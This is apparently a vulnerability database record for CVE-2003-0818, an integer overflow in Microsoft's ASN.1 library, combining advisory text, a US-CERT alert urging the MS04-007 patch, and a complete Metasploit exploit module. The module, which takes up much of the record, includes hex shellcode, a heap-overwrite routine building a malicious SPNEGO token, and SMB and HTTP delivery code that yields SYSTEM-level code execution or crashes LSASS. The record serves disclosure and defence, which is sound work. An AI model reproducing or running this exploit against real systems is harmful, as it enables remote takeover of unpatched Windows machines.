ID

VAR-200403-0051

CVE

CVE-2003-0818

TITLE

Microsoft ASN.1 Library improperly decodes constructed bit strings

DESCRIPTION

Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. This vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. Issues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft ASN.1 Library Bitstring Heap Overflow', 'Description' => %q{ This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary. }, 'Author' => [ 'Solar Eclipse <solareclipse@phreedom.org>' ], 'License' => GPL_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0818'], [ 'OSVDB', '3902' ], [ 'BID', '9633'], [ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'], [ 'MSB', 'MS04-007'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed) { 'Platform' => 'win', }, ], ], 'DisclosureDate' => 'Feb 10 2004', 'DefaultTarget' => 0)) register_options( [ OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']), ], self.class) end # This exploit is too destructive to use during automated exploitation. # Better Windows-based exploits exist at this time (Sep 2006) def autofilter false end # This is a straight port of Solar Eclipse's "kill-bill" exploit, published # as a Metasploit Framework module with his permission. This module is only # licensed under GPLv2, keep this in mind if you embed the Framework into # a non-GPL application. -hdm[at]metasploit.com def exploit # The first stage shellcode fixes the PEB pointer and cleans the heap stage0 = "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+ "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+ "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+ "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+ "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+ "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+ "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+ "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+ "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+ "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+ "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+ "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+ "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+ "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+ "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+ "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+ "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+ "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+ "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+ "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+ "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+ "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+ "\x08\x00\xeb\xfe" token = spnego_token(stage0, payload.encoded) case datastore['PROTO'] when 'smb' exploit_smb(token) when 'http' exploit_http(token) else print_status("Invalid application protocol specified, use smb or http") end end def exploit_smb(token) connect client = Rex::Proto::SMB::Client.new(sock) begin client.session_request(smb_hostname()) if not datastore['SMBDirect'] client.negotiate client.session_setup_ntlmv2_blob(token) rescue => e if (e.to_s =~ /error code 0x00050001/) print_status("The target system has already been exploited") else print_status("Error: #{e}") end end handler disconnect end def exploit_http(token) connect req = "GET / HTTP/1.0\r\n" req << "Host: #{ datastore['RHOST']}\r\n" req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n" sock.put(req) res = sock.get_once if (res and res =~ /0x80090301/) print_status("This server does not support the Negotiate protocol or has already been exploited") end if (res and res =~ /0x80090304/) print_status("This server responded with error code 0x80090304 (wth?)") end handler disconnect end # Returns an ASN.1 encoded string def enc_asn1(str) Rex::Proto::SMB::Utils::asn1encode(str) end # Returns an ASN.1 encoded bit string with 0 unused bits def enc_bits(str) "\x03" + enc_asn1("\x00" + str) end # Returns a BER encoded constructed bit string def enc_constr(*str_arr) "\x23" + enc_asn1(str_arr.join('')) end # Returns a BER encoded SPNEGO token def spnego_token(stage0, stage1) if !(stage0 and stage1) print_status("Invalid parameters passed to spnego_token") return end if (stage0.length > 1032) print_status("The stage 0 shellcode is longer than 1032 bytes") return end tag = "\x90\x42\x90\x42\x90\x42\x90\x42" if ((tag.length + stage1.length) > 1033) print_status("The stage 1 shellcode is too long") return end # The first two overwrites must succeed, so we write to an unused location # in the PEB block. We don't care about the values, because after this the # doubly linked list of free blocks is corrupted and we get to the second # overwrite which is more useful. fw = "\xf8\x0f\x01\x00" # 0x00010ff8 bk = "\xf8\x0f\x01" # The second overwrite writes the address of our shellcode into the # FastPebLockRoutine pointer in the PEB peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB bitstring = enc_constr( enc_bits("A" * 1024), "\x03\x00", enc_constr( enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))), enc_constr( enc_bits(fw + bk) ), enc_constr( enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))), enc_constr( enc_bits("\xeb\x06" + make_nops(6)), enc_bits("D" * 1040) ) ) ) ) token = "\x60" + enc_asn1( # Application Constructed Object "\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID "\xa0" + enc_asn1( # NegTokenInit (0xa0) "\x30" + enc_asn1( "\xa1" + enc_asn1( bitstring ) ) ) ) return token end end . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multiple Vulnerabilities in Microsoft ASN.1 Library Original issue date: February 10, 2004 Last revised: -- Source: US-CERT A complete revision history is at the end of this document. According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic. Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library. Solution Apply a patch Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Microsoft Please see Microsoft Security Bulletin MS04-007. References * Vulnerability Note VU#216324 - <http://www.kb.cert.org/vuls/id/216324> * Vulnerability Note VU#583108 - <http://www.kb.cert.org/vuls/id/583108> * eEye Digital Security Advisory AD20040210 - <http://www.eeye.com/html/Research/Advisories/AD20040210.html> * eEye Digital Security Advisory AD20040210-2 - <http://www.eeye.com/html/Research/Advisories/AD20040210-2.html> * Microsoft Security Bulletin MS04-007 - <http://microsoft.com/technet/security/bulletin/MS04-007.asp> * Microsoft Knowledge Base Article 252648 - <http://support.microsoft.com/default.aspx?scid=252648> _________________________________________________________________ These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document. _________________________________________________________________ Feedback can be directed to the author, Art Manion. Copyright 2004 Carnegie Mellon University. Revision History February 10, 2004: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW 5hU8LQ/oOC4sI8PpnkppCyg= =Oe/N -----END PGP SIGNATURE-----

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

network

TYPE

Boundary Condition Error

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Discovery of this vulnerability has been credited to eEye Digital Security.

SOURCES

LAST UPDATE DATE

2024-08-14T12:57:20.421000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE